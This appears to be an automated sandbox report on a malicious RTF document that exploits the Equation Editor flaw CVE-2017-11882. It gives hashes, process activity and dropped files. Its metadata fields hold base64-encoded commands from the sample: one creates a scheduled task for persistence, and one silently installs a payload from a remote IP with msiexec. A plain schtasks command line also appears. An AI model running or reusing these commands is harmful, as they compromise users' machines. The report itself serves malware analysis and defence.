analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

bf9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtf

Full analysis: https://app.any.run/tasks/904d9d5e-8326-4e8b-862f-be615f260229
Verdict: Malicious activity
Analysis date: April 23, 2019, 13:32:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
exploit
CVE-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, ANSI
MD5:

B3F8ABE274CB6A5926BD5C3FC2168997

SHA1:

D3AE9CAA678754631AED1C82C409B5D43A0A9C80

SHA256:

BF9987B84B3F7DAAA460777E5850A60F10898D0238048D3D5D07D7EC1656E47A

SSDEEP:

3072:7Qc9WBKBHFuVPrlmIAzqv/njAa1UWGV0ODJ:7QIW4BluVPR53njAMGVdDJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2152)

    • Uses Task Scheduler to run other applications

      • EQNEDT32.EXE (PID: 2596)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3032)

  • SUSPICIOUS

    • Creates files in the Windows directory

      • EQNEDT32.EXE (PID: 2596)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3140)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3140)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Title: Dear All
Subject: c2NodGFza3MgL2NyZWF0ZSAvc2MgTUlOVVRFIC90biAiQXBwIiAvdHIgIkM6XFdpbmRvd3NcdHJhY2luZ1x0cmFjaW5nLnZicyIgL21vIDIgL0Y=
Author: Windows User
Comments: U2V0IHdzID0gQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCndzLlJ1biAibXNpZXhlYyAvcSAvaSBodHRwOi8vMTg1LjIzNC43My40L0IiLDA=
LastModifiedBy: AntiSec
CreateDate: 2019:04:17 10:33:00
ModifyDate: 2019:04:17 10:33:00
RevisionNumber: 2
TotalEditTime: 1 minute
Pages: 1
Words: 129
Characters: 741
Company: c2NodGFza3MgL2NyZWF0ZSAvc2MgTUlOVVRFIC90biAiQXBwIiAvdHIgIkM6XFdpbmRvd3NcdHJhY2luZ1x0cmFjaW5nLnZicyIgL21vIDIgL3J1IHN5c3RlbQ==
CharactersWithSpaces: 869
InternalVersionNumber: 24689
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
4
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe no specs eqnedt32.exe no specs schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3140"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\bf9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2152"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
2596"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEEQNEDT32.EXE
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
3032schtasks.exe /create /sc MINUTE /tn ChromeApp /tr "C:\Windows\tracing\ChromeApp.vbs" /mo 2 /FC:\Windows\system32\schtasks.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 043
Read events
713
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
1
Text files
2
Unknown types
3

Dropped files

PID
Process
Filename
Type
3140WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR5621.tmp.cvr
MD5:
SHA256:
2596EQNEDT32.EXEC:\Windows\tracing\ChromeApp.ps1text
MD5:7659725493D248C2AB23A7134EB532D0
SHA256:C5D3550D518024D4B4BE073E6307D1728A05AE3AF8F31A9D31031A4F1CEB85BE
3140WINWORD.EXEC:\Users\admin\AppData\Local\Temp\8.tbinary
MD5:C3B087297C2DFDCD44BFF7DF6C4F27DB
SHA256:9EC83E7A2B22C3A03DB2C2B84234404D07A81B5B0AFCE52FB83BA8F3DF90B68C
3140WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtfpgc
MD5:0A778CC6202F02AC5FEFB4099D000158
SHA256:6F312809B821E67C7AB30921658ED0200D86D95D91A049F77DC9920D0C45E803
3140WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:03F75A861CC10AD1C3318BEB891B725B
SHA256:7EBE4AE513B230A4E93B55D5C5B1A8281E935A6A42B38FA33B58EA5B73980E58
2596EQNEDT32.EXEC:\Windows\tracing\ChromeApp.vbstext
MD5:520BB90BC1B7E8A8203E9856C209105E
SHA256:63A604385DE613DF41870A92FB4D890892C2BB106852549FAB197026CAA8FE2D
3140WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5909E647.wmfwmf
MD5:82154D73906767D7B810864B32E3EBAD
SHA256:6FD66589D2ED5D42039174EA02F331F127EFEB166E61EA3558B0EA7A2B771A77
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
bf9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtf